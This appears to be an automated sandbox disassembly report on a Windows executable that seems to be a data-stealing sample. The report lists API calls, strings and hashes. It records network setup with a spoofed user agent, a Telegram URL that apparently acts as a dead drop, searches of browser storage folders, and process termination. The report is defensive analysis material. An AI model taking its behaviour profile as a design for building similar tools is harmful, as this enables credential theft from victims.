                                                                                                                                                                                                control_flow_graph 0 157be1-157c55 call 17fc9a call 157aaa call 1586f4 call 14a821 call 14a85f call 149973 call 1461c0 15 157e52-157e5d call 14b3b2 0->15 18 157e63 15->18 19 157c5a-157c71 call 157603 call 1573cd 15->19 21 157e7d-157e8a call 14a85f 18->21 26 157c76-157d23 call 157854 call 1586b1 call 14e073 call 157b46 call 15b11a call 156884 call 1586f4 call 14a821 * 3 call 14b682 19->26 27 157f4c-157f58 call 14b3b2 21->27 92 157e65-157e78 call 14a821 call 14a678 26->92 93 157d29-157e4d call 14a85f call 1573cd call 1586bf call 14a678 call 14a821 call 157854 call 1586b1 call 14e073 call 1586f4 call 14a821 call 157b46 call 15b11a call 156884 call 1586f4 call 14a821 * 4 call 14a678 26->93 33 157e8f-157f47 call 157603 call 14b4ba call 14b614 call 1573cd call 14a821 * 2 call 157854 call 1586b1 call 14e073 call 1586f4 call 14a821 call 14a678 27->33 34 157f5e-157fc6 call 15b11a call 14a898 call 15b2ab call 14a1f8 call 14b558 27->34 33->27 63 157fcb-1580a8 call 15840e FindWindowA call 14b3e8 * 3 call 14a568 call 14b3e8 call 14a568 call 155726 call 155040 call 14a568 call 15ad7e 34->63 127 15826e-1582a3 call 14a568 call 15ad7e 63->127 128 1580ae-1580f0 call 14b3e8 call 14a568 call 15ad7e 63->128 92->21 93->15 141 1583a5-1583da call 14a568 call 15ad7e 127->141 142 1582a9-1582e6 call 14b3e8 call 14a568 call 15ad7e 127->142 128->127 152 1580f6-158269 call 1585ea call 14b3e8 * 5 call 14a568 call 14b3e8 call 14a568 call 14b3e8 call 14a568 call 14b3e8 call 14a568 call 14b3e8 call 14a568 call 14b3e8 call 14a568 call 14b3e8 call 14a568 call 149fc4 call 149a90 call 1584e1 128->152 163 158405-158407 ExitProcess 141->163 164 1583dc-158400 call 14b3e8 call 14a568 call 1576ce 141->164 142->141 173 1582ec-1583a0 call 1586a1 call 14b3e8 * 3 call 14a568 call 14b3e8 call 14a568 call 14b3e8 call 14a568 call 1597dc call 15960c call 1585fd 142->173 152->127 164->163 173->141
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00157BEB
                                                                                                                                                                                                  • Part of subcall function 00157AAA: __EH_prolog3_GS.LIBCMT ref: 00157AB1
                                                                                                                                                                                                  • Part of subcall function 00157AAA: __Xtime_get_ticks.LIBCPMT ref: 00157AC3
                                                                                                                                                                                                  • Part of subcall function 00157AAA: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00157AD0
                                                                                                                                                                                                  • Part of subcall function 001461C0: __EH_prolog3_GS.LIBCMT ref: 001461C7
                                                                                                                                                                                                  • Part of subcall function 001461C0: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000,00000000,2226158375018974002), ref: 0014629D
                                                                                                                                                                                                • FindWindowA.USER32(Hello,World), ref: 00157FE8
                                                                                                                                                                                                  • Part of subcall function 0014B3E8: __EH_prolog3.LIBCMT ref: 0014B3EF
                                                                                                                                                                                                  • Part of subcall function 0014A568: __EH_prolog3_GS.LIBCMT ref: 0014A56F
                                                                                                                                                                                                  • Part of subcall function 00155726: __EH_prolog3.LIBCMT ref: 0015572D
                                                                                                                                                                                                  • Part of subcall function 00155040: __EH_prolog3_GS.LIBCMT ref: 0015504A
                                                                                                                                                                                                  • Part of subcall function 00155040: GetNativeSystemInfo.KERNEL32(?,x86,00000000), ref: 00155155
                                                                                                                                                                                                  • Part of subcall function 0015AD7E: __EH_prolog3.LIBCMT ref: 0015AD85
                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00158407
                                                                                                                                                                                                  • Part of subcall function 00149FC4: __EH_prolog3.LIBCMT ref: 00149FCB
                                                                                                                                                                                                  • Part of subcall function 00149A90: __EH_prolog3_GS.LIBCMT ref: 00149A9A
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_$H_prolog3$ExitFindInfoInternetNativeOpenProcessSystemUnothrow_t@std@@@WindowXtime_get_ticks__ehfuncinfo$??2@
                                                                                                                                                                                                • String ID: .$/ujs/$1735725939$Hello$Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603$World$brCH$brGk$exG$fnc$https://$https://t.me/asdfghjrrewqqqqtfg$ostr$str
                                                                                                                                                                                                • API String ID: 1170277527-2651802916
                                                                                                                                                                                                • Opcode ID: ede89361751443d3006e28c30b3057e507fdbb546fa0059f33ef9c70331fd05b
                                                                                                                                                                                                • Instruction ID: 06750380b16168d8d0ccc552363b208fcfaa3ad385435695d7ecb760d04afa8e
                                                                                                                                                                                                • Opcode Fuzzy Hash: ede89361751443d3006e28c30b3057e507fdbb546fa0059f33ef9c70331fd05b
                                                                                                                                                                                                • Instruction Fuzzy Hash: EA32DF31D05298EADF05FBA4C986BEDBBB8AF25300F5440D9E4057B192DB745F48CBA2
                                                                                                                                                                                                Function 001461C0 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 75networkCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 001461C7
                                                                                                                                                                                                  • Part of subcall function 0015C2B7: __EH_prolog3_GS.LIBCMT ref: 0015C2C1
                                                                                                                                                                                                  • Part of subcall function 0015C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0015C0F7
                                                                                                                                                                                                • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000,00000000,2226158375018974002), ref: 0014629D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_$H_prolog3_catch_InternetOpen
                                                                                                                                                                                                • String ID: 13697246453241158521$2226158375018974002$3933506600908304605$789593363246702628$Kernel32.dll$Wininet.dll
                                                                                                                                                                                                • API String ID: 1967328160-2221855235
                                                                                                                                                                                                • Opcode ID: 107e9c2323e66a41f0b2fa54da2e24f5e27f3c7db433caed490b3e2021a58c9b
                                                                                                                                                                                                • Instruction ID: 52ff57aeaef2536b59971951eaace694e0cdb9cebb87408f0dd2aaad818a616b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 107e9c2323e66a41f0b2fa54da2e24f5e27f3c7db433caed490b3e2021a58c9b
                                                                                                                                                                                                • Instruction Fuzzy Hash: EE218D70E01249FECB01FBB8894669D7EB5AF25300F50419DF850AB292C7B40F559BE2
                                                                                                                                                                                                Function 0014C1B8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 224COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0014C1C2
                                                                                                                                                                                                  • Part of subcall function 0014C4D0: __EH_prolog3.LIBCMT ref: 0014C4D7
                                                                                                                                                                                                  • Part of subcall function 0014CAF1: __EH_prolog3.LIBCMT ref: 0014CAF8
                                                                                                                                                                                                  • Part of subcall function 0014CAF1: _Func_class.LIBCONCRT ref: 0014CB97
                                                                                                                                                                                                  • Part of subcall function 0014E5D5: __EH_prolog3_GS.LIBCMT ref: 0014E5DF
                                                                                                                                                                                                  • Part of subcall function 0014CBA6: __EH_prolog3.LIBCMT ref: 0014CBAD
                                                                                                                                                                                                  • Part of subcall function 0014EFDD: __EH_prolog3_GS.LIBCMT ref: 0014EFE7
                                                                                                                                                                                                  • Part of subcall function 0014CCE6: __EH_prolog3_GS.LIBCMT ref: 0014CCED
                                                                                                                                                                                                  • Part of subcall function 00145F62: ___std_exception_destroy.LIBVCRUNTIME ref: 00145FA5
                                                                                                                                                                                                  • Part of subcall function 0014B07F: __EH_prolog3_GS.LIBCMT ref: 0014B086
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_$H_prolog3$Func_class___std_exception_destroy
                                                                                                                                                                                                • String ID: value
                                                                                                                                                                                                • API String ID: 367360030-494360628
                                                                                                                                                                                                • Opcode ID: 1fe068fee3ee7a0acff620710e776228b52f3170c81d80108ef89f236d2c78be
                                                                                                                                                                                                • Instruction ID: ca94a574a589c31732b4afba50ea51387a382de1dd76c49d57ce3ecb4e1fd50f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1fe068fee3ee7a0acff620710e776228b52f3170c81d80108ef89f236d2c78be
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4591D371D01248DEDB14EB64C955BEDBBB4AF25300F5441DDE149B72A2EB701F48CBA2
                                                                                                                                                                                                Function 0014B558 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 0014B562
                                                                                                                                                                                                  • Part of subcall function 0014B07F: __EH_prolog3_GS.LIBCMT ref: 0014B086
                                                                                                                                                                                                  • Part of subcall function 0014C4D0: __EH_prolog3.LIBCMT ref: 0014C4D7
                                                                                                                                                                                                  • Part of subcall function 0014E0D4: __EH_prolog3.LIBCMT ref: 0014E0DB
                                                                                                                                                                                                  • Part of subcall function 0014E0D4: _Func_class.LIBCONCRT ref: 0014E12D
                                                                                                                                                                                                  • Part of subcall function 0014E0D4: _Func_class.LIBCONCRT ref: 0014E17F
                                                                                                                                                                                                  • Part of subcall function 0014E0D4: _Func_class.LIBCONCRT ref: 0014E192
                                                                                                                                                                                                  • Part of subcall function 0014C1B8: __EH_prolog3_GS.LIBCMT ref: 0014C1C2
                                                                                                                                                                                                  • Part of subcall function 0014C0C7: _Func_class.LIBCONCRT ref: 0014C10A
                                                                                                                                                                                                • _Func_class.LIBCONCRT ref: 0014B607
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Func_class$H_prolog3$H_prolog3_
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3328072954-0
                                                                                                                                                                                                • Opcode ID: fd865c1e54269ed450b9ae5aaaf8a24f8c1543992e4d186e1a089a8c03396653
                                                                                                                                                                                                • Instruction ID: 618533874114079a23a7df5db68df88349b21e999e88eb94e0a60eb0a3e84c4b
                                                                                                                                                                                                • Opcode Fuzzy Hash: fd865c1e54269ed450b9ae5aaaf8a24f8c1543992e4d186e1a089a8c03396653
                                                                                                                                                                                                • Instruction Fuzzy Hash: A4218E70C06289EEDF05EFA8C911ADEBFB0AF25304F548098E84877362C7755B45CBA2
                                                                                                                                                                                                Function 001702FE Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 423 1702fe-170307 424 170336-170337 423->424 425 170309-17031c RtlFreeHeap 423->425 425->424 426 17031e-170335 GetLastError call 164e16 call 164eb3 425->426 426->424
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,00177B16,?,00000000,?,?,00177DB7,?,00000007,?,?,0017836C,?,?), ref: 00170314
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00177B16,?,00000000,?,?,00177DB7,?,00000007,?,?,0017836C,?,?), ref: 0017031F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                • Opcode ID: e6dbb1fd292e2a3304f16e8b88c3b1ffc8030f69a8f9167ea555ee3b3bfc514b
                                                                                                                                                                                                • Instruction ID: 19e3425d5e324f295505cb6b6c2057d68837c909ba89e362c58edb4ce7889061
                                                                                                                                                                                                • Opcode Fuzzy Hash: e6dbb1fd292e2a3304f16e8b88c3b1ffc8030f69a8f9167ea555ee3b3bfc514b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8AE08631500304EFCB312FA0AC49B967BA8BB14391F158024F50C86560D7358990C7D4
                                                                                                                                                                                                Function 00157870 Relevance: 1.7, APIs: 1, Instructions: 155COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 458 157870-1578b0 call 17fcd0 461 157985-15798a call 17fc35 458->461 462 1578b6-1578b8 458->462 464 15798d-157996 462->464 465 1578be-1578d3 462->465 467 157a0e-157a2a call 1606e0 464->467 468 157998-1579c6 call 1606e0 * 2 464->468 469 1578d9-1578f6 465->469 470 157a6a-157a86 call 14b2c0 call 14b06b call 1602fe 465->470 483 157a31-157a42 call 1606e0 467->483 468->483 471 157907-15790b call 14fa93 469->471 472 1578f8-157904 469->472 480 157910-157932 call 1606e0 471->480 472->471 491 157934-157936 480->491 492 157949-15796c call 1606e0 * 2 480->492 483->461 491->492 494 157938-157947 call 1606e0 491->494 500 15796f-157980 call 1500c0 492->500 494->500 500->461
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_catch
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3886170330-0
                                                                                                                                                                                                • Opcode ID: c9d97aedc8e46cf14484c10e0ab6d847ff753ffcd52e7f29425bf89ea977c0f7
                                                                                                                                                                                                • Instruction ID: 73b7f3ee9afa7977773dc3fb282f1e5745aaa4bbc93cd370322fc63926ef95b3
                                                                                                                                                                                                • Opcode Fuzzy Hash: c9d97aedc8e46cf14484c10e0ab6d847ff753ffcd52e7f29425bf89ea977c0f7
                                                                                                                                                                                                • Instruction Fuzzy Hash: E8515A71D00209DFCF05DFA8D9869AEBBB5BF48314F248229E914B7391D7319A54CBA0
                                                                                                                                                                                                Function 001602FE Relevance: 1.5, APIs: 1, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 503 1602fe-160316 504 160345-160367 KiUserExceptionDispatcher 503->504 505 160318-16031b 503->505 506 16031d-160339 505->506 507 16033b-16033e 505->507 506->504 506->507 507->504 508 160340 507->508 508->504
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,00145BD8,?,?,?,?,00145BD8,?,00197E08), ref: 0016035E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 6842923-0
                                                                                                                                                                                                • Opcode ID: 104a5109ce61e234b31a462d5c9822c2ba01dc01b8d4b0f7e6f3068a9150d427
                                                                                                                                                                                                • Instruction ID: 131aa4d5fcddee60ada286a41ac7eb38f7d61729091cd2e2d816dc879c308b5e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 104a5109ce61e234b31a462d5c9822c2ba01dc01b8d4b0f7e6f3068a9150d427
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3001A275900208AFCB029F5CD884B9EBBB9FF48701F154059E915AB392D770EE01CB90
                                                                                                                                                                                                Function 0017188C Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 511 17188c-171898 512 1718ca-1718d5 call 164eb3 511->512 513 17189a-17189c 511->513 521 1718d7-1718d9 512->521 515 1718b5-1718c6 RtlAllocateHeap 513->515 516 17189e-17189f 513->516 517 1718a1-1718a8 call 16e871 515->517 518 1718c8 515->518 516->515 517->512 523 1718aa-1718b3 call 16bd82 517->523 518->521 523->512 523->515
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,001414D8,00000000,?), ref: 001718BE
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                • Opcode ID: 910dd3a45017b1539c174b284e425bfa031cb332ff608004ced7b78781e51ba7
                                                                                                                                                                                                • Instruction ID: d5f6e27cefc20e4b110e0c204f3b01b987089924a3eec91b1c378d22a2e9fb99
                                                                                                                                                                                                • Opcode Fuzzy Hash: 910dd3a45017b1539c174b284e425bfa031cb332ff608004ced7b78781e51ba7
                                                                                                                                                                                                • Instruction Fuzzy Hash: DCE0ED31604220B7EB312A6DAC00B5B3BBCAF117A1F168220BD0D9A680DB64CC4082E7

                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                Function 00147A82 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 222fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00147A8C
                                                                                                                                                                                                  • Part of subcall function 0014B4BA: __EH_prolog3.LIBCMT ref: 0014B4C1
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?,0000035C,00148101,?,\storage\default\,?), ref: 00147AE0
                                                                                                                                                                                                • PathMatchSpecA.SHLWAPI(?,00000000,?), ref: 00147B91
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00147C9B
                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,00000010,?,?,?,?,?,?), ref: 00147D09
                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?), ref: 00147D14
                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,00000010), ref: 00147D46
                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00147D5C
                                                                                                                                                                                                • FindClose.KERNEL32(?,?,?,?,?,?,?), ref: 00147D68
                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00147DB7
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Find$CloseFile$FirstNext$H_prolog3H_prolog3_MatchPathSpec
                                                                                                                                                                                                • String ID: \idb\
                                                                                                                                                                                                • API String ID: 757186195-120003160
                                                                                                                                                                                                • Opcode ID: 721bae3734f3ebc9ffdfcb7f5050131f8a6a12044b80a32518fc51712b0252fc
                                                                                                                                                                                                • Instruction ID: d77ea6f296181e413c093c3110f0c08e7bba8bd135b380c645df0f29f880316a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 721bae3734f3ebc9ffdfcb7f5050131f8a6a12044b80a32518fc51712b0252fc
                                                                                                                                                                                                • Instruction Fuzzy Hash: B9A18A30C0425ADFCB25EFA0C998BEDBBB4AF24304F5441A8E455A71A2DB745F89CF51
                                                                                                                                                                                                Function 0015AFE8 Relevance: 13.6, APIs: 9, Instructions: 83sleepprocessCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0015AFF2
                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000268,00149C15,?,?,0018F604), ref: 0015B004
                                                                                                                                                                                                • Process32FirstW.KERNEL32 ref: 0015B022
                                                                                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?,?,?), ref: 0015B0BE
                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0015B0CD
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0015B0D4
                                                                                                                                                                                                • Process32NextW.KERNEL32(?,0000022C), ref: 0015B0E7
                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0015B101
                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 0015B10C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CloseHandleProcessProcess32$CreateFirstH_prolog3_NextOpenSleepSnapshotTerminateToolhelp32
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 271363041-0
                                                                                                                                                                                                • Opcode ID: 299c88489c93aade95b910695fe218730d0f31fbbf0bb6cdb4bb67946980e4c4
                                                                                                                                                                                                • Instruction ID: ad6451b79fb4e7b73446bc235f9b9134e2d4830681e04c27ebd2f1d03d947986
                                                                                                                                                                                                • Opcode Fuzzy Hash: 299c88489c93aade95b910695fe218730d0f31fbbf0bb6cdb4bb67946980e4c4
                                                                                                                                                                                                • Instruction Fuzzy Hash: BD318D31901229DBCB30AF60CD89BAEB7B4AF10306F104194F969AB190EB315F88CF65
                                                                                                                                                                                                Function 001587FB Relevance: 13.0, APIs: 4, Strings: 3, Instructions: 723memorysleepCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00158805
                                                                                                                                                                                                  • Part of subcall function 0014B3E8: __EH_prolog3.LIBCMT ref: 0014B3EF
